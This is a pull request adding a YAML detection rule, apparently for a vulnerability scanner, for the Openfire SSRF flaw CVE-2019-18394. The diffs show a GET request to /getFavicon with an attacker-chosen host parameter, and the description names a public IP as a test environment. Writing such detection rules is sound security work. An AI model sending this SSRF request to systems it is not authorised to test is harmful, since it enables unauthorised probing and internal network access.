### PR TITLE
Create openfire-ssrf-cve-2019-18394.yml

### DIFF
--- a/pocs/openfire-cve-2019-18394-ssrf.yml
+++ b/pocs/openfire-cve-2019-18394-ssrf.yml
@@ -1,13 +1,10 @@
 name: poc-yaml-openfire-cve-2019-18394-ssrf
-set:
-  reverse: newReverse()
-  reverseHost: reverse.url.host
 rules:
   - method: GET
-    path: /getFavicon?host={{reverseHost}}/?
+    path: /getFavicon?host=baidu.com/?
     follow_redirects: false
     expression: |
-      response.status == 200 && response.content_type.contains("image/x-icon")
+      response.status == 200 && response.content_type.contains("image/x-icon") && response.body.bcontains(bytes("www.baidu.com"))
 detail:
   author: su(https://suzzz112113.github.io/#blog)
   links:

--- a/pocs/openfire-cve-2019-18394-ssrf.yml
+++ b/pocs/openfire-cve-2019-18394-ssrf.yml
@@ -1,14 +1,13 @@
-name: poc-yaml-openfire-ssrf-cve-2019-18394
+name: poc-yaml-openfire-cve-2019-18394-ssrf
 set:
   reverse: newReverse()
   reverseHost: reverse.url.host
-  reverseURL: reverse.url.path
 rules:
   - method: GET
-    path: /getFavicon?host={{reverseHost}}{{reverseURL}}
+    path: /getFavicon?host={{reverseHost}}/?
     follow_redirects: false
     expression: |
-      reverse.wait(5)
+      response.status == 200 && response.content_type.contains('image/x-icon')
 detail:
   author: su(https://suzzz112113.github.io/#blog)
   links:

--- a/pocs/openfire-cve-2019-18394-ssrf.yml
+++ b/pocs/openfire-cve-2019-18394-ssrf.yml
@@ -7,7 +7,7 @@ rules:
     path: /getFavicon?host={{reverseHost}}/?
     follow_redirects: false
     expression: |
-      response.status == 200 && response.content_type.contains('image/x-icon')
+      response.status == 200 && response.content_type.contains("image/x-icon")
 detail:
   author: su(https://suzzz112113.github.io/#blog)
   links:

--- a/pocs/openfire-ssrf-cve-2019-18394.yml
+++ b/pocs/openfire-ssrf-cve-2019-18394.yml
@@ -1,0 +1,16 @@
+name: poc-yaml-openfire-ssrf-cve-2019-18394
+set:
+  reverse: newReverse()
+  reverseHost: reverse.url.host
+  reverseURL: reverse.url.path
+rules:
+  - method: GET
+    path: /getFavicon?host={{reverseHost}}{{reverseURL}}
+    follow_redirects: false
+    expression: |
+      reverse.wait(5)
+detail:
+  author: su(https://suzzz112113.github.io/#blog)
+  links:
+    - https://www.cnvd.org.cn/patchInfo/show/192993
+    - https://www.cnblogs.com/potatsoSec/p/13437713.html


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
   Openfire（以前称为Wildfire和Jive Messenger）是一个即時通訊（IM）和群聊服务器，它使用Java编写的XMPP服务器，这个Poc是用来检测Openfire 4.4.3之前版本存在的未授权的回显形SSRF漏洞。
  https://github.com/igniterealtime/Openfire

## 测试环境
 http://118.89.51.162:8890

## 备注
   影响版本：Openfire< 4.4.3。
